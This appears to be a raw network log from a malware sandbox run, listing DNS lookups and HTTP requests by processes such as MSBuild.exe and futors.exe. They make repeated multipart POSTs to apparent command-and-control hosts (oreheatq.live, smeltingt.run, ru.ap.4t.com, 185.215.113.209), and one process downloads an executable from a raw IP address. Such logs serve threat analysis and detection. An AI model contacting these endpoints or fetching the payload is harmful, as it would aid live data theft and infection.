server-timing: cfL4;desc="?proto=TCP&rtt=51490&min_rtt=44391&rtt_var=20827&sent=6&recv=8&lost=0&retrans=0&sent_bytes=3290&recv_bytes=635&delivery_rate=82081&cwnd=253&unsent_bytes=0&cid=e59c41ee3a53dae3&ts=282&x=0"
POST

https://oreheatq.live/gsopp

MSBuild.exe

Remote address:

172.67.172.183:443

Request

POST /gsopp HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=Kl1nArlC4dC10IjvU
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
Content-Length: 1593
Host: oreheatq.live

Response

HTTP/1.1 200 OK

Date: Sat, 29 Mar 2025 01:30:05 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5kUMKeVpURmZspZjQ0Qfje3RrxOz22g%2FfSTH%2BeGncBQAoIr63xymcE5QjwubG%2FIHi6NKwrkFafcZtwyozC8iDeW0sNPQf9m902dm8NGUUsUdrpCjGgqjaleaAokOmOw1"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 927b9999cbe9cd25-LHR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=50502&min_rtt=43527&rtt_var=17596&sent=10&recv=12&lost=0&retrans=0&sent_bytes=4227&recv_bytes=2565&delivery_rate=82081&cwnd=255&unsent_bytes=0&cid=e59c41ee3a53dae3&ts=567&x=0"
POST

https://oreheatq.live/gsopp

MSBuild.exe

Remote address:

172.67.172.183:443

Request

POST /gsopp HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=2lWvE6Kbj
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
Content-Length: 1026
Host: oreheatq.live

Response

HTTP/1.1 200 OK

Date: Sat, 29 Mar 2025 01:30:06 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6Wpmkef3u8f4yrP3WqzpQiOqCHMBW%2B9iWe0fcNdrho1S%2FbpsorKI1NhlhImRae%2FpYA3zYwnaSH9bV7mLErGazi3%2B41fVrOY9ymquwlSitbq3n4ZsktxL8RFKjA55%2FzZB"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 927b999bd81e4968-LHR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=52489&min_rtt=44195&rtt_var=17542&sent=6&recv=7&lost=0&retrans=0&sent_bytes=3290&recv_bytes=1628&delivery_rate=89160&cwnd=253&unsent_bytes=0&cid=ef0c4f676397fff0&ts=229&x=0"
POST

https://oreheatq.live/gsopp

MSBuild.exe

Remote address:

172.67.172.183:443

Request

POST /gsopp HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
Content-Length: 79
Host: oreheatq.live

Response

HTTP/1.1 200 OK

Date: Sat, 29 Mar 2025 01:30:06 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Server: cloudflare
Vary: Accept-Encoding
Cf-Cache-Status: DYNAMIC
CF-RAY: 927b999dfada635e-LHR
alt-svc: h3=":443"; ma=86400
DNS

galarona.bet

Rm3cVPI.exe

Remote address:

8.8.8.8:53

Request

galarona.bet

IN A

Response
POST

https://oreheatq.live/gsopp

Rm3cVPI.exe

Remote address:

172.67.172.183:443

Request

POST /gsopp HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
Content-Length: 59
Host: oreheatq.live

Response

HTTP/1.1 200 OK

Date: Sat, 29 Mar 2025 01:30:11 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cbzuJqTvh7fu6RoWNsrsblj6fyl6RCog%2BJJrMbRtopMeJJmdCUNrWGXG5wE%2B%2B%2Fl7ULyBVDHth%2BTCZ0rszE7BPFpf%2Fbsw51uhXZ5LiB2qGUWS6cNI8Eikc4tnhEMr6TKU"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 927b99becc41beba-LHR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=47598&min_rtt=43781&rtt_var=15590&sent=6&recv=7&lost=0&retrans=0&sent_bytes=3290&recv_bytes=653&delivery_rate=66024&cwnd=253&unsent_bytes=0&cid=8d0c0ecf773c91f7&ts=258&x=0"
POST

https://oreheatq.live/gsopp

Rm3cVPI.exe

Remote address:

172.67.172.183:443

Request

POST /gsopp HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=5KA0GOzb1W9
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
Content-Length: 1581
Host: oreheatq.live

Response

HTTP/1.1 200 OK

Date: Sat, 29 Mar 2025 01:30:12 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zP0D8uQaU%2B5uF7H7lPLTfLMqoVA7Pkb2tSvm2rPrNkCBCOokBel%2FVQsa6VajAuHf%2FVR%2FA%2FqfuyeQRCzM5TgIW0ffCik1Q5vGIlwT1O%2FPLJDT1jylg6hoKpmmziOWlLM%2F"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 927b99c09d42beba-LHR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=47101&min_rtt=43576&rtt_var=12688&sent=9&recv=11&lost=0&retrans=0&sent_bytes=4237&recv_bytes=2565&delivery_rate=66024&cwnd=255&unsent_bytes=0&cid=8d0c0ecf773c91f7&ts=506&x=0"
POST

https://oreheatq.live/gsopp

Rm3cVPI.exe

Remote address:

172.67.172.183:443

Request

POST /gsopp HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=bGAYAtdU9p25
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
Content-Length: 1066
Host: oreheatq.live

Response

HTTP/1.1 200 OK

Date: Sat, 29 Mar 2025 01:30:12 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RZBcza23honFDAyvwSz5n5jM0FHba%2Bf8c3DF5dcYw7jdJmmwYLNwXz9p6M0PT5jC4IDQAy8gyEyb%2BhutuaBm7JwkYvefxu20oZz90IDZLKHLPK21lr226tFpuO8n9sBm"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 927b99c2bacd6325-LHR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=47395&min_rtt=45365&rtt_var=12714&sent=6&recv=7&lost=0&retrans=0&sent_bytes=3290&recv_bytes=1671&delivery_rate=77157&cwnd=253&unsent_bytes=0&cid=1ec85f3f5e8950c0&ts=247&x=0"
POST

https://oreheatq.live/gsopp

Rm3cVPI.exe

Remote address:

172.67.172.183:443

Request

POST /gsopp HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
Content-Length: 97
Host: oreheatq.live

Response

HTTP/1.1 200 OK

Date: Sat, 29 Mar 2025 01:30:12 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FQwTUGd2qwGfkunlwjRB%2Bc0h%2FEf5F8i03%2B8Pi%2FE0ARUsMQah3G9J4j6eh7ENEbI5LNkncLapJy%2Fj3wXTdXDeN6Ys8o8LHttV7dG4g%2BzoZOTvTnjheeB64e4qpUKiwtSN"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 927b99c4bdbd8a91-LHR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=43649&min_rtt=43361&rtt_var=9606&sent=6&recv=7&lost=0&retrans=0&sent_bytes=3290&recv_bytes=691&delivery_rate=90702&cwnd=253&unsent_bytes=0&cid=7d585bbee8406e59&ts=226&x=0"
DNS

t.me

MSBuild.exe

Remote address:

8.8.8.8:53

Request

t.me

IN A

Response

t.me

IN A

149.154.167.99
GET

https://t.me/lw25chm

MSBuild.exe

Remote address:

149.154.167.99:443

Request

GET /lw25chm HTTP/1.1
Host: t.me
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Sat, 29 Mar 2025 01:30:13 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 12322
Connection: keep-alive
Set-Cookie: stel_ssid=2501d9051935d67693_12854515624773885587; expires=Sun, 30 Mar 2025 01:30:13 GMT; path=/; samesite=None; secure; HttpOnly
Pragma: no-cache
Cache-control: no-store
X-Frame-Options: ALLOW-FROM https://web.telegram.org
Content-Security-Policy: frame-ancestors https://web.telegram.org
Strict-Transport-Security: max-age=35768000
DNS

ru.ap.4t.com

MSBuild.exe

Remote address:

8.8.8.8:53

Request

ru.ap.4t.com

IN A

Response

ru.ap.4t.com

IN A

88.99.125.82
GET

https://ru.ap.4t.com/

MSBuild.exe

Remote address:

88.99.125.82:443

Request

GET / HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 Chrome/132.0.0.0 Safari/537.36 OPR/117.0.0.0
Host: ru.ap.4t.com
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sat, 29 Mar 2025 01:30:14 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
POST

https://ru.ap.4t.com/

MSBuild.exe

Remote address:

88.99.125.82:443

Request

POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----ymo89rim79hvaasr9hv3
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 Chrome/132.0.0.0 Safari/537.36 OPR/117.0.0.0
Host: ru.ap.4t.com
Content-Length: 256
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sat, 29 Mar 2025 01:30:15 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
POST

https://ru.ap.4t.com/

MSBuild.exe

Remote address:

88.99.125.82:443

Request

POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----00hl68q90r90zukfkxtr
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 Chrome/132.0.0.0 Safari/537.36 OPR/117.0.0.0
Host: ru.ap.4t.com
Content-Length: 331
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sat, 29 Mar 2025 01:30:15 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
DNS

e6.o.lencr.org

MSBuild.exe

Remote address:

8.8.8.8:53

Request

e6.o.lencr.org

IN A

Response

e6.o.lencr.org

IN CNAME

o.lencr.edgesuite.net

o.lencr.edgesuite.net

IN CNAME

a1887.dscq.akamai.net

a1887.dscq.akamai.net

IN A

2.18.190.198

a1887.dscq.akamai.net

IN A

2.18.190.116
GET

http://e6.o.lencr.org/MFMwUTBPME0wSzAJBgUrDgMCGgUABBTUejiAQejpjQc4fOz2ttjyD6VkMQQUDcXM%2FZvuFAWhTDCCpT5eisNYCdICEgYEVrKs0X5mI1JbaJC85MXisg%3D%3D

MSBuild.exe

Remote address:

2.18.190.198:80

Request

GET /MFMwUTBPME0wSzAJBgUrDgMCGgUABBTUejiAQejpjQc4fOz2ttjyD6VkMQQUDcXM%2FZvuFAWhTDCCpT5eisNYCdICEgYEVrKs0X5mI1JbaJC85MXisg%3D%3D HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/10.0
Host: e6.o.lencr.org

Response

HTTP/1.1 200 OK

Server: nginx
Content-Type: application/ocsp-response
Content-Length: 344
ETag: "BC213604F4EECCCD4E6A6945FEE36566A541223FBC8A492CD7BC3C2BA9DFC2B3"
Last-Modified: Fri, 28 Mar 2025 14:53:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=3443
Expires: Sat, 29 Mar 2025 02:27:38 GMT
Date: Sat, 29 Mar 2025 01:30:15 GMT
Connection: keep-alive
POST

https://ru.ap.4t.com/

MSBuild.exe

Remote address:

88.99.125.82:443

Request

POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----4w479zuk6pzcjec2nyus
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 Chrome/132.0.0.0 Safari/537.36 OPR/117.0.0.0
Host: ru.ap.4t.com
Content-Length: 331
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sat, 29 Mar 2025 01:30:16 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
POST

https://ru.ap.4t.com/

MSBuild.exe

Remote address:

88.99.125.82:443

Request

POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----dtrqieuaai58yuaiwtjm
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 Chrome/132.0.0.0 Safari/537.36 OPR/117.0.0.0
Host: ru.ap.4t.com
Content-Length: 332
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sat, 29 Mar 2025 01:30:16 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
POST

https://ru.ap.4t.com/

MSBuild.exe

Remote address:

88.99.125.82:443

Request

POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----b1djmym7yuk68qi5pppz
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 Chrome/132.0.0.0 Safari/537.36 OPR/117.0.0.0
Host: ru.ap.4t.com
Content-Length: 4765
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sat, 29 Mar 2025 01:30:17 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
POST

https://ru.ap.4t.com/

MSBuild.exe

Remote address:

88.99.125.82:443

Request

POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----cjeuk6xb16pzm79hv37g
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 Chrome/132.0.0.0 Safari/537.36 OPR/117.0.0.0
Host: ru.ap.4t.com
Content-Length: 489
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sat, 29 Mar 2025 01:30:18 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
POST

https://ru.ap.4t.com/

MSBuild.exe

Remote address:

88.99.125.82:443

Request

POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----s0rqi589z58yu37gvkno
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 Chrome/132.0.0.0 Safari/537.36 OPR/117.0.0.0
Host: ru.ap.4t.com
Content-Length: 218917
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sat, 29 Mar 2025 01:30:19 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
POST

https://ru.ap.4t.com/

MSBuild.exe

Remote address:

88.99.125.82:443

Request

POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----c2dt0r1dbsje379hdb1n
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 Chrome/132.0.0.0 Safari/537.36 OPR/117.0.0.0
Host: ru.ap.4t.com
Content-Length: 55081
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sat, 29 Mar 2025 01:30:20 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
POST

https://ru.ap.4t.com/

MSBuild.exe

Remote address:

88.99.125.82:443

Request

POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----vsj5xtj5xbie37q1nopp
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 Chrome/132.0.0.0 Safari/537.36 OPR/117.0.0.0
Host: ru.ap.4t.com
Content-Length: 177957
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sat, 29 Mar 2025 01:30:21 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
DNS

www.google.com

chrome.exe

Remote address:

8.8.8.8:53

Request

www.google.com

IN A

Response

www.google.com

IN A

142.250.180.4
GET

https://www.google.com/async/ddljson?async=ntp:2

chrome.exe

Remote address:

142.250.180.4:443

Request

GET /async/ddljson?async=ntp:2 HTTP/2.0
host: www.google.com
sec-fetch-site: none
sec-fetch-mode: no-cors
sec-fetch-dest: empty
sec-fetch-storage-access: active
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36
accept-encoding: gzip, deflate, br, zstd
accept-language: en-US,en;q=0.9
priority: u=4, i
GET

https://www.google.com/async/newtab_ogb?hl=en-US&async=fixed:0

chrome.exe

Remote address:

142.250.180.4:443

Request

GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/2.0
host: www.google.com
x-client-data: CNn7ygE=
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: empty
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36
accept-encoding: gzip, deflate, br, zstd
accept-language: en-US,en;q=0.9
priority: u=4, i
GET

https://www.google.com/async/newtab_promos

chrome.exe

Remote address:

142.250.180.4:443

Request

GET /async/newtab_promos HTTP/2.0
host: www.google.com
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: empty
sec-fetch-storage-access: active
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36
accept-encoding: gzip, deflate, br, zstd
accept-language: en-US,en;q=0.9
priority: u=4, i
DNS

ogads-pa.clients6.google.com

chrome.exe

Remote address:

8.8.8.8:53

Request

ogads-pa.clients6.google.com

IN A

Response

ogads-pa.clients6.google.com

IN A

142.250.187.234
DNS

apis.google.com

chrome.exe

Remote address:

8.8.8.8:53

Request

apis.google.com

IN A

Response

apis.google.com

IN CNAME

plus.l.google.com

plus.l.google.com

IN A

142.250.180.14
DNS

play.google.com

chrome.exe

Remote address:

8.8.8.8:53

Request

play.google.com

IN A

Response

play.google.com

IN A

172.217.169.46
DNS

smeltingt.run

MSBuild.exe

Remote address:

8.8.8.8:53

Request

smeltingt.run

IN A

Response

smeltingt.run

IN A

104.21.74.51

smeltingt.run

IN A

172.67.155.64
POST

https://smeltingt.run/giiaus

MSBuild.exe

Remote address:

104.21.74.51:443

Request

POST /giiaus HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
Content-Length: 41
Host: smeltingt.run

Response

HTTP/1.1 200 OK

Date: Sat, 29 Mar 2025 01:30:24 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yLomLlo9oixuG5MFhpOHEKtOct2i5Et0pM15xylEYeuP3Y33VQR9MfW6jAdr1Tk5Q8mKyMkL8ZIYECjcbsRLFTt4EUF0YhSsFIR4JbuyQ3VwbQ4KQZAsP96e3WOMyq8g"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 927b9a0c5b0360ed-LHR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=46521&min_rtt=43385&rtt_var=14354&sent=6&recv=7&lost=0&retrans=0&sent_bytes=3285&recv_bytes=636&delivery_rate=68038&cwnd=253&unsent_bytes=0&cid=207600f33e508c1d&ts=256&x=0"
POST

https://smeltingt.run/giiaus

MSBuild.exe

Remote address:

104.21.74.51:443

Request

POST /giiaus HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=EG7bQjOErYKOIjW95v8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
Content-Length: 1625
Host: smeltingt.run

Response

HTTP/1.1 200 OK

Date: Sat, 29 Mar 2025 01:30:24 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HkDrz7EWyP7vl4R%2FIBMOwUXbQQ3cc3Itk8QuRHplQdpLJ0EvLz%2FvdSwm4vJj2mr6EDkaUKzRQeOnx16agsRDYi3jTIT9zwAJ3o5WbW%2FklIKgNPkluhUboaGz4uVe7a8N"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 927b9a0e5c0860ed-LHR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=46181&min_rtt=43385&rtt_var=11445&sent=10&recv=11&lost=0&retrans=0&sent_bytes=4220&recv_bytes=2601&delivery_rate=68038&cwnd=255&unsent_bytes=0&cid=207600f33e508c1d&ts=523&x=0"
POST

https://smeltingt.run/giiaus

MSBuild.exe

Remote address:

104.21.74.51:443

Request

POST /giiaus HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=t7M9Yv9hxC62Qz05
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
Content-Length: 1061
Host: smeltingt.run

Response

HTTP/1.1 200 OK

Date: Sat, 29 Mar 2025 01:30:24 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Server: cloudflare
Vary: Accept-Encoding
Cf-Cache-Status: DYNAMIC
CF-RAY: 927b9a1068c4e900-LHR
alt-svc: h3=":443"; ma=86400
POST

https://smeltingt.run/giiaus

MSBuild.exe

Remote address:

104.21.74.51:443

Request

POST /giiaus HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
Content-Length: 79
Host: smeltingt.run

Response

HTTP/1.1 200 OK

Date: Sat, 29 Mar 2025 01:30:25 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Server: cloudflare
Vary: Accept-Encoding
Cf-Cache-Status: DYNAMIC
CF-RAY: 927b9a127919edf3-LHR
alt-svc: h3=":443"; ma=86400
DNS

clients2.google.com

chrome.exe

Remote address:

8.8.8.8:53

Request

clients2.google.com

IN A

Response

clients2.google.com

IN CNAME

clients.l.google.com

clients.l.google.com

IN A

172.217.16.238
DNS

clients2.googleusercontent.com

chrome.exe

Remote address:

8.8.8.8:53

Request

clients2.googleusercontent.com

IN A

Response

clients2.googleusercontent.com

IN CNAME

googlehosted.l.googleusercontent.com

googlehosted.l.googleusercontent.com

IN A

142.250.200.1
GET

http://185.215.113.16/test/amnew.exe

rapes.exe

Remote address:

185.215.113.16:80

Request

GET /test/amnew.exe HTTP/1.1
Host: 185.215.113.16

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Sat, 29 Mar 2025 01:30:21 GMT
Content-Type: application/octet-stream
Content-Length: 439296
Last-Modified: Thu, 30 Jan 2025 18:34:28 GMT
Connection: keep-alive
ETag: "679bc634-6b400"
Accept-Ranges: bytes
POST

https://ru.ap.4t.com/

MSBuild.exe

Remote address:

88.99.125.82:443

Request

POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----5xbieu3e3ec2nymgdtje
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 Chrome/132.0.0.0 Safari/537.36 OPR/117.0.0.0
Host: ru.ap.4t.com
Content-Length: 493
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sat, 29 Mar 2025 01:30:29 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
POST

https://ru.ap.4t.com/

MSBuild.exe

Remote address:

88.99.125.82:443

Request

POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----8q9rieuknopzu3wbsjm7
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 Chrome/132.0.0.0 Safari/537.36 OPR/117.0.0.0
Host: ru.ap.4t.com
Content-Length: 262605
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sat, 29 Mar 2025 01:30:33 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
POST

http://185.215.113.209/Di0Her478/index.php

futors.exe

Remote address:

185.215.113.209:80

Request

POST /Di0Her478/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.215.113.209
Content-Length: 4
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Sat, 29 Mar 2025 01:30:24 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
POST

http://185.215.113.209/Di0Her478/index.php

futors.exe

Remote address:

185.215.113.209:80

Request

POST /Di0Her478/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.215.113.209
Content-Length: 158
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Sat, 29 Mar 2025 01:30:26 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
POST

http://185.215.113.209/Di0Her478/index.php

futors.exe

Remote address:

185.215.113.209:80

Request

POST /Di0Her478/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.215.113.209
Content-Length: 32
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Sat, 29 Mar 2025 01:30:37 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
POST

http://185.215.113.209/Di0Her478/index.php

futors.exe

Remote address:

185.215.113.209:80

Request

POST /Di0Her478/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.215.113.209
Content-Length: 32
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Sat, 29 Mar 2025 01:30:42 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
POST

http://185.215.113.209/Di0Her478/index.php

futors.exe

Remote address:

185.215.113.209:80

Request

POST /Di0Her478/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.215.113.209
Content-Length: 32
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
